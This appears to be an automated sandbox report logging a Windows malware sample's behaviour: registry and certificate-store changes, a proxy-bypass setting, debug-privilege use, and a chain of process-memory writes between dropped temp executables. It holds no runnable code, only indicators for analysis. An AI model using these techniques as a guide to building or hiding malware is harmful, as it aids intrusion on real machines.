Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1088 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1088 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1088 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1200 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1200 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1200 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 3184 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3184 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3184 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 2004 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2004 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
